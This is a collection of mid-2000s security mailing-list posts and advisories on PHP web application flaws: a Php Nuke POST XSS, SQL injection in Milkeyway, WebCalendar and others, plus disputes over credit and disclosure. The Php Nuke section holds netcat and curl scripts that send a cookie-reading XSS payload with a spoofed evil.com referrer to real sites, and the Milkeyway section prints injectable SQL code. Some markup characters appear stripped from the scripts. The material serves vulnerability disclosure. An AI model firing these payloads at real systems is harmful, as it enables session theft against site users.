Stefan Esser wrote: Taking into account that the vulnerability you describe is fixed in Hardened-PHP for years and that there is also a protection against this in the Suhosin Extension you can be sure that this NOT a new vulnerability (and that you are not the first one who found it...) not being credited is really annoying and i understand your feelings but it happens, take a look here, this vulnerability was fixed 3, 4 times? http://www.ush.it/2006/01/25/php5-globals-vulnerability/ i'm sure i wasn't credited at all but who cares, i just want the bugs fixed, and i think that this is the spirit of this month For the record, the same vulnerability was reported by me on the 23.10.2004 at 22:05 in a mail to [EMAIL PROTECTED] (before I added the protection to Hardened-PHP) At that time the PHP developers considered it NOT A VULNERABILITY. some misunderstanding in the communication between you and php team? it happens and i'm sad for it but this is not our fault fun on 21.10.2004 at 20:12 i called my grandmother but she was sleeping, she is an old lady and it's normal to fall asleep at that age : ) /fun i think that it's possible that your month of php bugs could have changed the way php devs look to vulnerabilities (if so the goal is fully reached) or it could be the full disclosure i mean: why don't publish something you found in 2004? just post an advisory of the type i found this, they said NO-NO, this is the bug, use my products to get protection Well now the PHP developers have commited a fix for this to the PHP CVS, crediting you instead of the original reporter (me) and as usual the fix is only fixing a part of the problem. umh.. next time publish your findings : ) you will get credit from the beginning and the bug will be fixed my feeling is that it's important to fix software, any way is allowed: if internal disclosure doesn't work i'll post to fd, or post directly to fd and while your products are valid and i personally use them my guess is that it's more important to fix things in php itself as from the statement you made initiative to improve PHP's security if there are other things in your products that are not fixed in php why don't publish them? (Hint: long names like HTTP_POST_VARS do exist...) the just fixed _POST and so on? nice : ) i really appreciate your work with php, keep up with the disclosure! Regards, Francesco 'ascii' Ongaro http://www.ush.it/ ps: add some smiles in your mails or people will get confused about the tone of your speaking : )
Php Nuke POST XSS on steroids
Php Nuke POST XSS on steroids Name Php Nuke POST XSS on steroids Systems Affected PHP =4.0.7 =5.2.1, GLOBALS OFF, Php Nuke 8.0 and others (partially verified) Severity Medium Vendorhttp://php nuke.org/ Advisory http://www.ush.it/2007/03/09/php-nuke-wild-post-xss/ Authors Francesco `ascii` Ongaro ([EMAIL PROTECTED]) Stefano `wisec` di Paola ([EMAIL PROTECTED]) Date 20070307 I. BACKGROUND Php Nuke is a CMS written in PHP. This advisory is just an example on how to exploit an XSS on platforms that use anti CSRF techniques with the import_request_variables() bypass. II. DESCRIPTION An XSS vulnerability exists in the handling of the query post variable in the Search function of the Downloads module. This is exploitable in special conditions; you need: - PHP =4.0.7 =5.2.1 to use the import_request_variables() trick - register_globals off (doesn't work with globals on) - Php Nuke 8 and others III. ANALYSIS Php Nuke 8.0 is vulnerable to an XSS on _POST, you can verify this using the provided testsuite. --- 8 --- 8 --- 8 --- 8 --- testsuite.sh --- 8 --- 8 --- 8 --- 8 #!/bin/bash cat REQ TOKEN POST /modules.php?name=Downloadsd_op=searchquery= HTTP/1.1 Host: www.phpnuke.org User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Connection: close Referer: http://www.phpnuke.org/modules.php?name=Downloads Cookie: lang=english Content-Type: application/x-www-form-urlencoded Content-Length: 23 query=tokentoken TOKEN cat REQ | nc www.phpnuke.org 80 -vvv --- 8 --- 8 --- 8 --- 8 --- --- 8 --- 8 --- 8 --- 8 $ ./testcase | grep tokentoken DNS fwd/rev mismatch: www.phpnuke.org != ev1s-67-15-16-43.ev1servers.net www.phpnuke.org [67.15.16.43] 80 (http) open form action=modules.php?name=Downloadsamp;d_op=searchamp;query=tokentoke Infact the injection is in the form action: form action=modules.php?name=Downloadsamp;d_op=searchamp;query=tokentoken method=post When you will try to apply CSRF to this bug (eg. you need a gateway page to send the post query) you'll notice that Php Nuke has a generic piece of code in mainfile.php that prevents posting with a wrong referrer. Test this with the following two testsuites: --- 8 --- 8 --- 8 --- 8 --- testsuit1.sh --- 8 --- 8 --- 8 --- 8 #!/bin/bash cat REQ TOKEN POST /modules.php?name=Downloadsd_op=searchquery= HTTP/1.1 Host: www.phpnuke.org User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Connection: close Referer: http://www.phpnuke.org/modules.php?name=Downloads Cookie: lang=english Content-Type: application/x-www-form-urlencoded Content-Length: 55 query=img src=evil onerror=alert(document.cookie) / TOKEN cat REQ | nc www.phpnuke.org 80 -vvv --- 8 --- 8 --- 8 --- 8 --- testsuit2.sh --- 8 --- 8 --- 8 --- 8 #!/bin/bash cat REQ TOKEN POST /modules.php?name=Downloadsd_op=searchquery= HTTP/1.1 Host: www.phpnuke.org User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Connection: close Referer: http://www.evil.com/ Cookie: lang=english Content-Type: application/x-www-form-urlencoded Content-Length: 55 query=img src=evil onerror=alert(document.cookie) / TOKEN cat REQ | nc www.phpnuke.org 80 -vvv --- 8 --- 8 --- 8 --- 8 --- --- 8 --- 8 --- 8 --- 8 In the first case the attack will succeed cause the referrer matches, in the second the anti-off-domain-post-check will block your attempt and you'll get a message like: Posting from another server not allowed! It seems that other versions have this check too. --- 8 --- 8 --- 8 --- 8 --- --- 8 --- 8 --- 8 --- 8 for i in `cat urls.txt`; do echo $i; curl -s http://$1/modules.php?name=Downloadsd_op=search; \ -d 'query=asdquery=tokenimg src=wrong onerror=alert(document.cookie) /' \ -e www.tin.it -H User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061208 Firefox/2.0.0.1; done; echo http://opic.it/ Posting from another server not allowed! http://nuke.org/ Posting from another server not allowed! http://ir.it/ Posting from another server not allowed! http://esi.it/ Posting from another server not allowed! http://oft.it/ Posting from another server not allowed! --- 8 --- 8 --- 8 --- 8 --- --- 8 --- 8 --- 8 --- 8 The initial part
Re: WordPress Search Function SQL-Injection
Justin Frydman - Thinkweb Media wrote: Can't replicate this in 2.0.7. Is this only for the 2.1.x branch then? i have the same feeling tested on multiple wp instances and can't reproduce on = 2.0.1 = 2.0.7 regards, Francesco 'ascii' Ongaro http://www.ush.it/
Re: Universal XSS with PDF files: highly dangerous
[EMAIL PROTECTED] wrote: Sorry about that but that's wrong. All the credits have to go to Stefano Di Paola and Giorgio Fedon. They presented that stuff at the 23C3 in Berlin. the original paper is located here http://events.ccc.de/congress/2006/Fahrplan/events/1602.en.html probably Stefano and Giorgio will post something on their site http://www.wisec.it/ (!hey i'm waiting too stefano : D) the technique exposed is really really neat but was only one of that has been presented at ccc in that talk (UXSS was used as an attack vector to inject JS to wrap/tamper xmlhttprequest and if the users had a proxy on his side http response splitting was used in conjunction to some keepalive bugs to tilt the browser cache to cause cross domain scripting, all this was autoinjecting) yeah it needs some conditions (a proxy with keepalive) but this is a bomb itself : ) from the pdf: Ajax Security, Universal Cross Site Scripting, Code Injection, Cache Poisoning, Prototype Hijacking, Auto Injecting Cross Domain Scripting anyway i expect to see something like an advisory/paper posted somewhere soon from the wisec staff because it's obvious that the ccc pdf isn't enough to metabolize all that stuff regards, Francesco 'ascii' Ongaro http://www.ush.it/ ps: flash 8 is fixed : )
Milkeyway Multiple Vulnerabilities
Milkeyway Captive Portal Multiple Vulnerabilities Name Multiple Vulnerabilities in Milkeyway Captive Portal Systems Affected WebCalendar (any version, verified on 0.1 and 0.1.1) Severity Medium Risk Vendorsourceforge.net/projects/milkeyway Advisory http://www.ush.it/team/ascii/hack-milkeway/milkeyway.txt AuthorFrancesco aScii Ongaro (ascii at katamail . com) Date 20060316 I. BACKGROUND Milkeyway is a software for the management and administration of internet access within public structures and frameworks, where the service supplying must be submitted to a scrupulous inspection. II. DESCRIPTION Nearly all SQL queries are vulnerable to SQL injection vulnerabilities. There are also some XSS vulnerabilities. III. ANALYSIS Since there are 28 detected different vulnerabilities only an abstract will be included in this mail, please refer to the complete advisory aviable here: http://www.ush.it/team/ascii/hack-milkeway/milkeyway.txt 1) LOGIN PAGE authenticate() SQL INJECTION 2) add_userIp() SQL INJECTION 3) updateTimeStamp() SQL INJECTION 4) authuser.php USER DELETE SQL INJECTION 5) delete_user() SQL INJECTION 6) authuser.php MODIFY USER modify_user() SQL INJECTION 7) authuser.php MULTIPLE XSS 8) authuser.php EDIT SQL INJECTION 9) authuser.php RELEASE USER SQL INJECTION 10) releaseUser() SQL INJECTION 11) authuser.php ORDERING SQL INJECTION 12) authgroup.php ADD GROUP SQL INJECTION 13) add_team() SQL INJECTION 14) authgroup.php DELETE GROUP SQL INJECTION 15) delete_team() SQL INJECTION 16) authgroup.php MODIFY TEAM SQL INJECTION 17) modify_team() SQL INJECTION 18) traffic.php MULTIPLE SQL INJECTION 19) userstatistics.php ADD USER SQL INJECTION 20) userstatistics.php DELETE USER SQL INJECTION 21) userstatistics.php MODIFY USER SQL INJECTION 22) userstatistics.php EDIT USER SQL INJECTION 23) userstatistics.php MULTIPLE XSS 24) userstatistics.php $_GET['username'] SQL INJECTION 1 25) userstatistics.php $_GET['username'] SQL INJECTION 2 26) chgpwd.php SQL INJECTION 1 27) chgpwd.php SQL INJECTION 2 28) logout.php SQL INJECTION IV. DETECTION Milkeyway 0.1 and 0.1.1 are vulnerable. V. WORKAROUND Input validation will fix the vulnerability. Magic quotes ON will protect you against most of these injections except chapter 11 (authuser.php ORDERING SQL INJECTION) where the input has no single or double quotes around, making magic quotes useless. 11) SQL is injectable by $_GET['filter'] in authuser.php - $orderingFilter = $_GET['filter']; if ($orderingFilter == '') $orderBy =order by uname ASC ; else $orderBy =order by .$orderingFilter. .$direction; $result = mysql_query(SELECT * FROM authuser .$orderBy ); -- VI. VENDOR RESPONSE Vendor has been contacted. VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20060301 Bug discovered 20060316 Vendor contacted 20060316 Advisory released IX. CREDIT ascii is credited with the discovery of this vulnerability. X. LEGAL NOTICES Copyright (c) 2005 Francesco aScii Ongaro Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Re: [KAPDA::#16] - SMF SQL Injection
[EMAIL PROTECTED] wrote: I'm a developer from over at simplemachines and I do not see how this can pose an exploit? /* tabs are evil */ if (!is_numeric($_REQUEST['start'])) { $request = db_query(SELECT COUNT(ID_MEMBER) FROM {$db_prefix}members WHERE LOWER(SUBSTRING(realName, 1, 1)) '. substr(strtolower($_REQUEST['start']), 0, 1) .' AND is_activated = 1, __FILE__, __LINE__); list ($_REQUEST['start']) = mysql_fetch_row($request); mysql_free_result($request); } me too, this piece of code isn't exploitable at last you can inject a ' that will issue a php error (path disclosure, error log filling but not an usable sql injection) The code is entered at this point: if (!is_numeric($_REQUEST['start'])) i would prefer ctype_digit or preg_match [09] cause is_numeric accept also hex, signed and floats substr(strtolower($_REQUEST['start']), 0, 1) I simply cannot see how you could possibly exploit SQL from this? it's impossible imho, but don't relay on magic quotes or this type of stuff, put a beautiful mysql_real_escape_string on each string passed to the db and cast integers (int)intval($_GET['id']) seems KAPDA Researchers researched this 'vuln' too fast : ) ascii - http://www.ush.it
Re: WebCalendar Multiple Vulnerabilities
Paul Laudanski wrote: I too tried contacting the vendor but received no response. Your timing of vendor notice and vul'n release are fast unfortunately. Taking a look, simple functions in PHP can be called upon to fix those issues. thanks Paul for the cooperation : ) i'm sorry i hadn't updated the advisory but now i done * * * * VI. VENDOR RESPONSE We had a response from Craig Knudsen, the project leader, on 20051128 night. The same day the fast Craig resolved 3 of the 4 issues in the REL_1_0_0 branch of CVS, so soon a new version (probably 1.0.2) will be released to the public. * * * * also on the sourceforge project site there are these posts related to this advisory (thanks Craig for the links) http://sourceforge.net/forum/forum.php?thread_id=1392833forum_id=11587 http://sourceforge.net/forum/forum.php?thread_id=1393468forum_id=11587 http://sourceforge.net/mailarchive/forum.php?thread_id=9091328forum_id=46247 http://sourceforge.net/mailarchive/forum.php?thread_id=9089995forum_id=46247 ascii - http://www.ush.it
WebCalendar Multiple Vulnerabilities
WebCalendar Multiple Vulnerabilities Name Multiple Vulnerabilities in WebCalendar Systems Affected WebCalendar (verified on 1.0.1) Severity Medium Risk Vendorwww.k5n.us/webcalendar.php?topic=About Advisory http://www.ush.it/2005/11/28/webcalendar-multiple-vulnerabilities/ Advisory http://www.ush.it/team/ascii/hack-WebCalendar/advisory.txt AuthorFrancesco aScii Ongaro (ascii at katamail . com) Date 20051128 WebCalendar is vulnerable to four SQL Injection (files activity_log.php, admin_handler.php, edit_template.php and export_handler.php) and one local file overwrite (export_handler.php), input validation will fix. Advisory released on 20051128: WebCalendar Multiple Vulnerabilities http://www.ush.it/2005/11/28/webcalendar-multiple-vulnerabilities/
Php Web Statistik Multiple Vulnerabilities
PHP Web Statistik Multiple Vulnerabilities Name Multiple Vulnerabilities in PHP Web Statistik Systems Affected PHP Web Statistik (verified on 1.4) Severity Medium Risk Vendorwww.php-web-statistik.de Advisory http://www.ush.it/2005/11/19/php-web-statistik/ AuthorFrancesco aScii Ongaro (ascii at katamail . com) Date 20051119 PHP Web Statistik is vulnerable to javascript and HTML injection using the unchecked $lastnumber variable, proper input validation will fix. Just place an intval() at the right row. Other vulnerabilities has been discovered later. Advisory released on 20051119: Php Web Statistik Multiple Vulnerabilities http://www.ush.it/2005/11/19/php-web-statistik/
Free Web Stat Multiple XSS Vulnerabilities
FreeWebStat Multiple XSS Vulnerabilities Name Multiple XSS Vulnerabilities in FreeWebStat Systems Affected FreeWebStat (verified on 1.0 rev37) Severity Medium Risk Vendorwww.freewebstat.com Advisory http://www.ush.it/2005/11/25/free-web-stat/ AuthorFrancesco aScii Ongaro (ascii at katamail . com) Date 20051125 FreeWebStat 1.0 rev37 (the last version at the write time) is vulnerable to multiple XSS. The impact is a little bigger since datas will be stored in a flat file and the result of a single query will persist for some time on the backend. A well-timed loop of requests will assure the XSS to be permanent. This can be used to inject arbitrary JS code into the page and make the JS pseudo-permanent, so other users will execute the JS without the need of any special url. Advisory released on 20051125: Free Web Stat Multiple XSS Vulnerabilities http://www.ush.it/2005/11/25/free-web-stat/